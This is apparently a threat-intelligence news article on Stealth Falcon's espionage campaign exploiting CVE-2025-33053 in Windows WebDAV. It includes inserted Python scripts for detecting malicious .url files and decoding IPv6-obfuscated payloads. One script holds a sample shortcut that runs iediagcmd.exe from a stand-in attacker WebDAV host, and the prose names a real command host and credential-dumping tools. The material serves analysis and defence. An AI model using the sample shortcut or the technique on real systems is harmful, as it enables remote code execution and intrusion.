A new cyberespionage campaign attributed to the notorious APT group Stealth Falcon has been uncovered by Check Point Research (CPR), highlighting the weaponization of a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV. The sophisticated attacks, focused primarily on defense entities in the Middle East and Africa, leveraged .url files, living-off-the-land binaries (LOLBins), and a custom-built Mythic agent dubbed Horus to stealthily infiltrate high-profile targets.
“The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server,” CPR revealed in its threat report.
The vulnerability, patched by Microsoft on June 10, 2025, allows remote code execution via manipulated working directories. By crafting a malicious .url file, the attackers exploited Windows’ execution flow to substitute legitimate system binaries with malware hosted on attacker-controlled WebDAV servers.
In one case, a file titled TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url was submitted by a Turkish defense company. The shortcut was crafted to execute iediagcmd.exe, a legitimate Windows diagnostic tool, but redirected its working directory to a WebDAV server, causing it to run a malicious route.exe instead of the system binary.
“The iediagcmd tool will run the route.exe executable the attackers placed in \\summerartcamp[.]net@ssl@443\… instead of a legitimate one in system32,” CPR explained.
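The shortcut shape described above (a local system binary named in the URL field, with WorkingDirectory pointing at a remote WebDAV share) is easy to flag on a mail gateway or file share before anyone double-clicks it. The Python triage script below is an added example and is not Check Point's tooling; the .url contents, the host name webdav.attacker.example and the iediagcmd.exe path are constructed for illustration, and the WebDAV host syntax it matches (\\host@ssl@443\share) is the one quoted in the report.

```python
"""Triage scanner for Internet Shortcut (.url) files that pair a local
executable with a remote (UNC / WebDAV) working directory, the pattern
described for CVE-2025-33053.  Added example; not Check Point's code."""
import re
from dataclasses import dataclass

# WebDAV UNC syntax: \\host@ssl@443\share or \\host@80\share
_WEBDAV_HOST = re.compile(r"^\\\\[^\\]+@(ssl@)?\d+\\", re.IGNORECASE)
# Any UNC path: \\host\share
_UNC = re.compile(r"^\\\\[^\\]+\\")
_EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr")


@dataclass
class UrlShortcut:
    url: str = ""
    working_directory: str = ""


def parse_url_file(text: str) -> UrlShortcut:
    """Minimal INI reader for the [InternetShortcut] section.
    Keys are case-insensitive; a UTF-8 BOM and CRLF endings are tolerated."""
    sc = UrlShortcut()
    in_section = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key == "url":
            sc.url = value
        elif key == "workingdirectory":
            sc.working_directory = value
    return sc


def _is_remote(path: str) -> bool:
    return bool(_UNC.match(path)) or path.lower().startswith(("http://", "https://"))


def assess(sc: UrlShortcut) -> dict:
    """Return a verdict and the individual findings for one shortcut."""
    findings = []
    url_l = sc.url.lower().rstrip("/")
    launches_local_exe = url_l.startswith("file:") and url_l.endswith(_EXEC_EXT)
    if launches_local_exe:
        findings.append("URL launches a local executable via the file: scheme")
    if _WEBDAV_HOST.match(sc.working_directory):
        findings.append("WorkingDirectory uses WebDAV host syntax (host@ssl@443)")
    elif _is_remote(sc.working_directory):
        findings.append("WorkingDirectory points to a remote share")
    # A local binary started with its working directory on a remote share is
    # the reported shape: a helper it launches by bare name (route.exe in the
    # CPR case) can resolve from that share instead of System32.
    if launches_local_exe and _is_remote(sc.working_directory):
        verdict = "high"
    elif findings:
        verdict = "medium"
    else:
        verdict = "none"
    return {"verdict": verdict, "findings": findings}


# Constructed samples (not the real IoCs).  The iediagcmd.exe path is the
# tool's usual location and is assumed here.
SUSPICIOUS_URL_FILE = (
    "\ufeff[InternetShortcut]\r\n"
    "URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe\r\n"
    "WorkingDirectory=\\\\webdav.attacker.example@ssl@443\\share\r\n"
)
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://www.example.com/\n"

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, assess(parse_url_file(text)))
```

Run it over a directory of attachments or a share and route anything with a "high" verdict to analysis; a "medium" verdict (remote working directory without a local executable, or vice versa) is worth a look but is also produced by some legitimate intranet shortcuts.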
The attack chain is multi-staged and cleverly obfuscated. The initial .url file loads a C++ malware loader called Horus Loader, which employs:
- Code Virtualizer obfuscation
- Anti-debugging techniques
- Manual DLL mapping
- Decoy document execution
- Memory-resident payload injection
Horus Loader decrypts and displays a legitimate PDF while injecting a custom payload, entirely composed of IP-fuscated IPv6 strings, into a suspended process (msedge.exe), effectively hiding the payload in network syntax.
“What’s revealed is a large list of IPv6 addresses… converted into the payload using thousands of calls to RtlIpv6StringToAddressA,” the researchers wrote.
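For analysts, the IP-fuscation described above can be undone without running the loader: every IPv6 literal carries exactly 16 bytes, so pulling the literals out of a strings dump in order and unpacking them recovers the embedded blob for hashing and static analysis, and an unusually large count of such literals is itself a triage signal. The script below is an added example, not Check Point's code; the strings-dump input is constructed and decodes to a harmless ASCII marker, and matching only the uncompressed eight-group form is an assumption made to keep false positives down.

```python
"""Recover a blob hidden as IPv6 string literals ("IP-fuscation") from a
strings dump of a sample, and score how anomalous the literal count is.
Added example; not Check Point's code."""
import ipaddress
import re

# Uncompressed IPv6 form only (eight 1-4 digit hex groups); compressed forms
# with '::' are ignored on the assumption that an obfuscator encoding raw
# 16-byte chunks emits every group.
_IPV6_FULL = re.compile(
    r"(?<![0-9A-Fa-f:])(?:[0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4}(?![0-9A-Fa-f:])"
)


def extract_ipv6_literals(dump: str) -> list[str]:
    """Return IPv6 literals in the order they appear in a strings dump."""
    return [m.group(0) for m in _IPV6_FULL.finditer(dump)]


def decode_ipfuscated(literals: list[str]) -> bytes:
    """Each literal is one 16-byte chunk; concatenate them in order.
    ipaddress performs the same parsing RtlIpv6StringToAddressA would."""
    return b"".join(ipaddress.IPv6Address(lit).packed for lit in literals)


def triage(dump: str, threshold: int = 64) -> dict:
    """Flag a sample whose strings contain an unusual number of IPv6
    literals and hand back the decoded bytes for hashing or disassembly.
    The default threshold is an arbitrary starting point; tune it locally."""
    literals = extract_ipv6_literals(dump)
    return {
        "ipv6_literal_count": len(literals),
        "suspicious": len(literals) >= threshold,
        "decoded": decode_ipfuscated(literals),
    }


# Constructed strings dump: two literals among ordinary import names.
# They decode to an ASCII marker, not to any real payload.
SAMPLE_STRINGS = "\n".join([
    "RtlIpv6StringToAddressA",
    "434f:4e53:5452:5543:5445:445f:424c:4f42",
    "2d6e:6f74:2d73:6865:6c6c:636f:6465:2121",
    "VirtualAlloc",
])

if __name__ == "__main__":
    result = triage(SAMPLE_STRINGS, threshold=2)
    print(result["ipv6_literal_count"], result["suspicious"])
    print(result["decoded"])
```

Feed it the output of a strings tool over the loader; a legitimate networking binary may contain a handful of IPv6 literals, but thousands of them, each different and none routable, is the signature the report describes.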
Once executed, the Horus Agent, a highly customized C++ implant built on the Mythic C2 framework, takes over. It communicates with a C2 infrastructure using AES encryption, HMAC integrity checks, and base64 encoding, and supports stealthy commands like:
- survey: fingerprint the target machine
- shinjectchunked: shellcode injection in stealth mode
- upload: data exfiltration
- exit: clean termination
The implant uses string obfuscation, API hashing, control flow flattening, and dummy Windows API imports to evade static analysis.
“This is likely intended to confuse static analysis engines… observed in previous Stealth Falcon backdoors,” Check Point stated.
The campaign also revealed a robust post-compromise toolkit, including:
- DC Credential Dumper: Extracts NTDS.dit, SAM, and SYSTEM files from virtual disks to bypass live OS locks.
- Passive Backdoor: A lightweight AES-encrypted listener embedded in a fake “User Profile Service Check.”
- Custom Keylogger: Logs keystrokes to RC4-encrypted files in C:\Windows\Temp.
Check Point attributes the campaign to Stealth Falcon (a.k.a. FruityArmor) based on code similarities, infrastructure overlaps, and region-specific targeting. The APT group has a known history of espionage campaigns against:
- Government and military organizations
- Intelligence agencies
- Strategic technology companies
“Stealth Falcon’s activities are largely focused on the Middle East and Africa, with high-profile targets in the government and defense sectors observed in Turkey, Qatar, Egypt, and Yemen,” the report states.
The Horus Agent marks a significant evolution from Stealth Falcon’s earlier implants like Apollo, a .NET-based Mythic agent. Unlike Apollo, Horus is rewritten in C++, offers more stealth, and combines multiple injection techniques into unified, configurable modules.